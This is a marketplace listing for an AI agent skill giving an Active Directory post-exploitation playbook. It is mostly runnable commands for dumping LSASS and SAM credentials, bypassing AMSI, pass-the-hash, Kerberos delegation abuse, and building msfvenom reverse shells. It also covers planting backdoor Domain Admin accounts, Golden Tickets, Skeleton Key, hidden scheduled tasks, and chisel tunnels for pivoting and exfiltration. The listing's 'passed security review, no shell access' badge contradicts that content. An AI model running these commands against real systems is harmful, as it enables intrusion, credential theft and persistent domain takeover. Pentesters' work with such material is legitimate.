AgentStack
Browse Sign in
Browse Why AgentStack Sell Docs
Sign in
SKILL verified MIT Self-run

Ad Postexploitation

skill-douglasrao-claude-pentest-skills-ad-postexploitation · by DouglasRao

>

No reviews yet
0 installs
7 views
0.0% view→install

Install

$ agentstack add skill-douglasrao-claude-pentest-skills-ad-postexploitation

✓ scanned · ✓ verified, works with Claude Code, Cursor, and more.

Security review

✓ Passed

No issues found. Passed automated security review. · v0.1.0 How review works →

  • Prompt-injection patterns
  • Secret / credential exfiltration
  • Dangerous shell & filesystem operations
  • Untrusted network calls
  • Known-malicious package signatures

What it can access

  • Network access No
  • Filesystem access No
  • Shell / process execution No
  • Environment & secrets No
  • Dynamic code execution No

From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.

View the full security report →

Verified badge

Passed review? Show it. Paste this badge into your README, it links to the public security report.

AgentStack Verified badge Links to your public security report.
[![AgentStack Verified](https://agentstack.voostack.com/badges/verified.svg)](https://agentstack.voostack.com/security/report/skill-douglasrao-claude-pentest-skills-ad-postexploitation)

Reliability & compatibility

Security review passed
0 installs to date
no reviews yet
4mo ago

Declared compatibility

Claude CodeClaude Desktop

Compatibility is declared by the source manifest. End-to-end runtime verification is coming, see below.

Preview Execution monitoring

We're building live execution health for every listing: tool-call success rate, median latency, uptime, and last-checked timestamps, measured, not self-reported. It isn't live yet, so we don't show numbers we can't stand behind.

How agent discovery & health will work →
Are you the author of Ad Postexploitation? Claim this listing to set pricing, connect Stripe payouts, and keep 70% of every sale.
Sign up to claim

About

AD Post-Exploitation — Lateral Movement, Escalation & Persistence

Architecture

This skill is largely knowledge-driven. Most commands run on Windows targets via an established shell (evil-winrm, psexec, WMI, RDP). The attack machine (Linux/macOS) handles tooling orchestration with impacket and tunneling utilities.

Context required:
  SHELL_TYPE   = evil-winrm / psexec / wmiexec / RDP / meterpreter
  TARGET_IP    = IP of the compromised host
  DC_IP        = Domain Controller IP
  DOMAIN       = domain FQDN
  USERNAME     = compromised account
  PASSWORD / NTLM_HASH = credentials
  PRIVILEGE    = current privilege level (standard user / local admin / DA)

Initial Setup — Situational Awareness

Run immediately after gaining access:

# Identity
whoami /all

# Domain context
net user %username% /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

# Network
ipconfig /all
route print
netstat -ano | findstr ESTABLISHED

# AV / EDR
sc query windefend
tasklist | findstr -i "defender\|carbon\|crowdstrike\|sentinel\|cylance\|cbdefense"

# PowerShell execution policy
Get-ExecutionPolicy -List

Create progress tasks with TaskCreate:

"STAGE 1 — Situational Awareness (identity, network, AV)"
"STAGE 2 — Credential Harvesting (LSASS, SAM, LSA secrets)"
"STAGE 3 — Lateral Movement (PTH, PTT, WinRM, PSExec)"
"STAGE 4 — Domain Privilege Escalation"
"STAGE 5 — Domain Persistence"
"STAGE 6 — Data Exfiltration"
"STAGE 7 — Cleanup Checklist"

Evidence Capture — Required at Every Stage

Before every major action, capture a screenshot:

# macOS (attack machine — terminal screenshot)
screencapture -x "$OUT/evidence/stage_$(date +%H%M%S)_$DESCRIPTION.png"

# Linux
scrot "$OUT/evidence/stage_$(date +%H%M%S)_$DESCRIPTION.png"

# BloodHound attack path export
# In BloodHound GUI: right-click path → Export → save as $OUT/evidence/bloodhound_path_to_DA.png

Capture terminal output to file alongside every command:

# Example: wrap evil-winrm session output
script -q -c "evil-winrm -i $TARGET_IP -u $USERNAME -p $PASSWORD" \
  "$OUT/evidence/shell_${TARGET_IP}_$(date +%Y%m%d_%H%M%S).log"

Submit to Notion when MCP available:

mcp__Notion__notion-create-pages — create finding page with evidence section
mcp__Notion__notion-update-page  — attach screenshot descriptions as blocks

Tool Priority

On attack machine (Linux/macOS)

impacket suite        — secretsdump, getST, ticketer, lookupsid, ntlmrelayx
crackmapexec/netexec  — credential sweep, CME modules (lsassy, nanodump, etc.)
evil-winrm            — WinRM shell with upload/download
chisel                — reverse SOCKS tunnel
socat                 — port forwarding

On Windows target (via shell)

Mimikatz              — LSASS dump, pass-the-hash, Golden/Silver Ticket, DCSync
Rubeus                — Kerberos attacks, ticket manipulation, AS-REP/Kerberoast
SharpHound            — BloodHound data collection
PowerView / AD Module — AD enumeration from inside
Seatbelt              — host situational awareness
winPEAS               — privilege escalation enumeration
GodPotato / PrintSpoofer / JuicyPotato — token impersonation
PsExec / PsExec64     — lateral movement
procdump / taskmanager — LSASS dump

MCPs (when available)

mcp__hexstrike-ai__*  — metasploit_run, msfvenom_generate (if Kali MCP connected)
mcp__Notion__*        — publish findings + evidence screenshots

STAGE 1 — In-Depth Situational Awareness

# Local admins on this machine
net localgroup Administrators

# Domain-joined machines the user has admin on (from CME sweep)
# (reference $RECON_OUT/enum/admin_hosts.txt from ad-exploitation)

# Active sessions on this machine
query session
query user

# Installed software
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName,DisplayVersion

# Patch level — look for known unpatched CVEs
systeminfo | findstr /i "hotfix\|KB"
# Cross-reference with https://github.com/SecureAuthCorp/impacket or Seatbelt

# AppLocker / WDAC
Get-AppLockerPolicy -Effective -Xml
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2

# AMSI patching (if needed for offensive tooling — show user)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

STAGE 2 — Credential Harvesting

LSASS dump (extract domain credentials)

Method 1 — Mimikatz (classic, detected by most AV)

# On Windows target:
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
# Or: dump specific creds
.\mimikatz.exe "privilege::debug" "sekurlsa::wdigest" "exit"
.\mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
.\mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "exit"

Method 2 — procdump (less detected)

# On Windows target:
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Transfer lsass.dmp to attack machine, then:
# On attack machine (Linux):
python3 -c "import pypykatz; pypykatz.run_from_file('lsass.dmp')"
# Or with Mimikatz on another Windows machine:
# sekurlsa::minidump lsass.dmp → sekurlsa::logonpasswords

Method 3 — impacket-secretsdump (remote, no shell needed if admin)

# On attack machine:
impacket-secretsdump "$DOMAIN/$USERNAME:$PASSWORD@$TARGET_IP"
impacket-secretsdump "$DOMAIN/$USERNAME@$TARGET_IP" -hashes "$NTLM_HASH"

Method 4 — crackmapexec lsassy module

$CME smb "$TARGET_IP" -u "$USERNAME" -p "$PASSWORD" -M lsassy
$CME smb "$TARGET_IP" -u "$USERNAME" -p "$PASSWORD" -M nanodump

Method 5 — Task Manager (GUI)

Task Manager → Details tab → right-click lsass.exe → Create dump file
Transfer to attack machine for offline parsing

SAM database dump (local accounts + hashes)

# Remote (impacket):
impacket-secretsdump "$DOMAIN/$USERNAME:$PASSWORD@$TARGET_IP" -just-dc-user "administrator"

# On Windows target (reg save + transfer):
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY
# Transfer to attack machine, then:
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

LSA secrets (service account credentials, autologon passwords)

impacket-secretsdump "$DOMAIN/$USERNAME:$PASSWORD@$TARGET_IP" -just-lsa

DPAPI (browser saved passwords, certificates)

# SharpDPAPI to extract Chrome/Edge credentials:
.\SharpDPAPI.exe triage
.\SharpDPAPI.exe credentials /password:$MASTERKEY_PASSWORD

STAGE 3 — Lateral Movement

Pass-the-Hash (PTH)

# impacket-psexec
impacket-psexec "$DOMAIN/$USERNAME@$TARGET_IP" -hashes ":$NT_HASH"

# impacket-smbexec
impacket-smbexec "$DOMAIN/$USERNAME@$TARGET_IP" -hashes ":$NT_HASH"

# impacket-wmiexec
impacket-wmiexec "$DOMAIN/$USERNAME@$TARGET_IP" -hashes ":$NT_HASH"

# evil-winrm (WinRM)
evil-winrm -i "$TARGET_IP" -u "$USERNAME" -H "$NT_HASH"

# crackmapexec execution
$CME smb "$TARGET_IP" -u "$USERNAME" -H "$NT_HASH" -x "whoami"

Pass-the-Ticket (PTT)

# Convert .ccache to Windows format (if needed):
impacket-ticketConverter ticket.ccache ticket.kirbi

# Use ticket directly with impacket (Linux):
export KRB5CCNAME="ticket.ccache"
impacket-psexec -k -no-pass "$DOMAIN/$USERNAME@$TARGET_HOSTNAME"
impacket-wmiexec -k -no-pass "$DOMAIN/$USERNAME@$TARGET_HOSTNAME"

Overpass-the-Hash (OPTH) — NTLM hash → Kerberos ticket

# On Windows (Mimikatz):
.\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:$USERNAME /domain:$DOMAIN /ntlm:$NT_HASH /run:powershell.exe" "exit"
# Or Rubeus:
.\Rubeus.exe asktgt /user:$USERNAME /rc4:$NT_HASH /domain:$DOMAIN /dc:$DC_IP /ptt

RDP

xfreerdp /u:"$USERNAME" /p:"$PASSWORD" /v:"$TARGET_IP" +clipboard /dynamic-resolution /cert:ignore
xfreerdp /u:"$USERNAME" /pth:"$NT_HASH" /v:"$TARGET_IP" +clipboard /cert:ignore
rdesktop -u "$USERNAME" -p "$PASSWORD" -d "$DOMAIN" "$TARGET_IP"

STAGE 4 — Domain Privilege Escalation

BloodHound — attack paths from current position

-- Shortest path to Domain Admins from owned account
MATCH p=shortestPath((u:User {name:"OWNED_USER@DOMAIN.LOCAL"})-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"})) RETURN p

-- What can the owned user do?
MATCH (u:User {name:"OWNED_USER@DOMAIN.LOCAL"})-[r]->(n) RETURN type(r), n.name

-- Find all computers where DA is logged in
MATCH (u:User)-[:MemberOf*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}),
      (c:Computer)-[:HasSession]->(u) RETURN c.name

ACL Abuse

GenericAll / GenericWrite over a user → password reset:

# Linux (impacket):
impacket-net "$DOMAIN/$OWNED_USER:$PASSWORD@$DC_IP" user "$TARGET_USER" -newpass "Passw0rd@123"
# Windows (PowerView):
Set-DomainUserPassword -Identity $TARGET_USER -AccountPassword (ConvertTo-SecureString 'Passw0rd@123' -AsPlainText -Force) -Verbose

WriteDACL over domain object → grant DCSync:

# PowerView:
Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity $OWNED_USER -Rights DCSync -Verbose
# Now run DCSync from attack machine

ForceChangePassword:

# PowerView:
Set-DomainUserPassword -Identity $TARGET_USER -AccountPassword (ConvertTo-SecureString 'Pass123!' -AsPlainText -Force)

AddMember (GenericAll over group):

# PowerView:
Add-DomainGroupMember -Identity "IT Admins" -Members $OWNED_USER -Verbose

Kerberos Delegation Attacks

Unconstrained Delegation — coerce DC auth + capture TGT:

# On compromised host with unconstrained delegation (Rubeus):
.\Rubeus.exe monitor /interval:5 /nowrap /filteruser:$DC_ACCOUNT$
# Trigger DC authentication (from attack machine):
python3 printerbug.py "$DOMAIN/$OWNED_USER:$PASSWORD@$DC_IP" "$UNCONSTRAINED_HOST"
# Or PetitPotam (unauthenticated trigger):
python3 PetitPotam.py -u "" -p "" "$UNCONSTRAINED_HOST" "$DC_IP"
# Rubeus captures the TGT → inject:
.\Rubeus.exe ptt /ticket:BASE64_TICKET
# Now DCSync

Constrained Delegation — S4U2Proxy:

impacket-getST "$DOMAIN/$SVC_ACCOUNT:$PASSWORD" -spn "cifs/$TARGET_HOSTNAME" -impersonate Administrator
export KRB5CCNAME="Administrator@cifs_$TARGET_HOSTNAME.ccache"
impacket-psexec -k -no-pass "$DOMAIN/Administrator@$TARGET_HOSTNAME"

Resource-Based Constrained Delegation (RBCD):

# Create fake computer account (if MachineAccountQuota > 0):
.\Powermad.ps1; New-MachineAccount -MachineAccount FakePC -Password (ConvertTo-SecureString 'FakePass123!' -AsPlainText -Force)
# Set msDS-AllowedToActOnBehalfOfOtherIdentity on target:
Set-ADComputer $TARGET_HOST -PrincipalsAllowedToDelegateToAccount FakePC$
# Get NT hash of FakePC, then S4U2Self + S4U2Proxy
impacket-getST "$DOMAIN/FakePC:FakePass123!" -spn "cifs/$TARGET_HOSTNAME" -impersonate Administrator

Local Privilege Escalation (from low-priv shell on Windows)

Token impersonation — SeImpersonatePrivilege (typical for IIS/MSSQL):

whoami /priv | findstr /i "impersonate\|assignprimary"
# If SeImpersonatePrivilege:
.\GodPotato.exe -cmd "cmd /c net user backdoor Pass123! /add && net localgroup Administrators backdoor /add"
.\PrintSpoofer.exe -i -c cmd     # Windows 10 / Server 2019+
.\JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}  # older systems

AlwaysInstallElevated:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both = 0x1:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=LHOST LPORT=LPORT -f msi > priv.msi
msiexec /quiet /qn /i priv.msi

Unquoted service path:

wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
# If found and path is writable:
icacls "C:\Program Files\Vulnerable Service\"
# Drop malicious binary in the gap

Writable service binary:

# List services + paths
Get-CimInstance -ClassName Win32_Service | Where-Object {$_.State -eq "Running"} | Select name,pathname
# Check ACL
icacls "C:\path\to\service.exe"
# If writable: replace binary with reverse shell, restart service
sc stop $SERVICE_NAME; sc start $SERVICE_NAME

STAGE 5 — Domain Persistence

Domain Admin account (quickest)

# On DC (via DA shell):
net user /add backdoor "P@ssw0rd123!" /domain
net group "Domain Admins" backdoor /add /domain
net group "Enterprise Admins" backdoor /add /domain

Golden Ticket (krbtgt hash → unlimited TGT forgery)

# Requires krbtgt NTLM hash + domain SID (from DCSync in ad-exploitation)
KRBTGT_HASH=$(grep -i krbtgt "$EXPLOIT_OUT/loot/krbtgt_hash.txt" | cut -d: -f4)
DOMAIN_SID=$(impacket-lookupsid "$DOMAIN/$USERNAME:$PASSWORD@$DC_IP" 2>/dev/null | grep "Domain SID" | awk '{print $NF}')

# Generate ticket (10-year validity):
impacket-ticketer -nthash "$KRBTGT_HASH" -domain-sid "$DOMAIN_SID" \
  -domain "$DOMAIN" -duration 3650 Administrator
export KRB5CCNAME="Administrator.ccache"
impacket-psexec -k -no-pass "$DOMAIN/Administrator@$DC_HOSTNAME"

Diamond Ticket (stealthier Golden Ticket — modifies real TGT)

# Rubeus on Windows:
.\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /krbkey:$KRBTGT_AES256 /nowrap

Silver Ticket (service account hash → forge service TGS)

impacket-ticketer -nthash "$SVC_HASH" -domain-sid "$DOMAIN_SID" \
  -domain "$DOMAIN" -spn "cifs/$TARGET_HOSTNAME" Administrator

Skeleton Key (Mimikatz — patches LSASS on DC, all users can auth with "mimikatz")

# On DC (requires DA):
.\mimikatz.exe "privilege::debug" "misc::skeleton" "exit"
# After: any user can authenticate with password "mimikatz" (until DC reboot)

AdminSDHolder ACL abuse (persistent DA via SDProp timer)

# Add owned user to AdminSDHolder DACL → SDProp propagates every 60min
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=corp,DC=local" \
  -PrincipalIdentity $OWNED_USER -Rights All -Verbose
# After ~60min, owned user has GenericAll over all protected groups

Scheduled task on DC

schtasks /create /s $DC_IP /u $DOMAIN\$USERNAME /p $PASSWORD \
  /tn "WindowsUpdate" /tr "powershell -nop -w hidden -enc BASE64_PAYLOAD" \
  /sc hourly /ru SYSTEM /f

STAGE 6 — Data Exfiltration & Pivoting

Sensitive files on domain shares

# Find interesting files on accessible shares
$CME smb $DC_IP -u $USERNAME -p $PASSWORD -M spider_plus

# Manual search
Get-ChildItem -Path \\$DC_IP\SYSVOL -Recurse -Include *.xml,*.ini,*.config 2>/dev/null | Select FullName
# GPP passwords (if old DC): look for cpassword in Groups.xml
Get-ChildItem -Path \\$DC_IP\SYSVOL -Recurse -Include Groups.xml | Select-String "cpassword"

Pivoting with chisel (expose internal services to attack machine)

# Attack machine: start server
chisel server -p 9001 --reverse

# On Windows target (upload chisel.exe via evil-winrm):
.\chisel.exe client LHOST:9001 R:8080:INTERNAL_HOST:80   # expose internal web app
.\chisel.exe client LHOST:9001 R:socks                    # SOCKS5 proxy to internal network

# Use SOCKS proxy on attack machine:
proxychains nmap -sT $INTERNAL_HOST
proxychains impacket-psexec $DOMAIN/$USERNAME:$PASSWORD@$INTERNAL_HOST

SSH tunnel from Windows (if OpenSSH available)

# On Windows target (PowerShell with OpenSSH):
ssh -N -R 8080:INTERNAL_HOST:80 attacker@LHOST    # reverse tunnel
ssh -N -D 1080 attacker@LHOST                      # SOCKS5

Transfer evidence back to attack machine

# Via evil-winrm download:
download C:\Windows\Temp\lsass.dmp

# Via SMB (attack machine: impacket-smbserver):
# Attack: impacket-smbserver sh

…

## Source & license

This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.

- **Author:** [DouglasRao](https://github.com/DouglasRao)
- **Source:** [DouglasRao/Claude-Pentest-Skills](https://github.com/DouglasRao/Claude-Pentest-Skills)
- **License:** MIT

Install and usage instructions live in the source repository linked above.

Reviews

No reviews yet, be the first.

Versions

  • v0.1.0 Imported from the upstream source.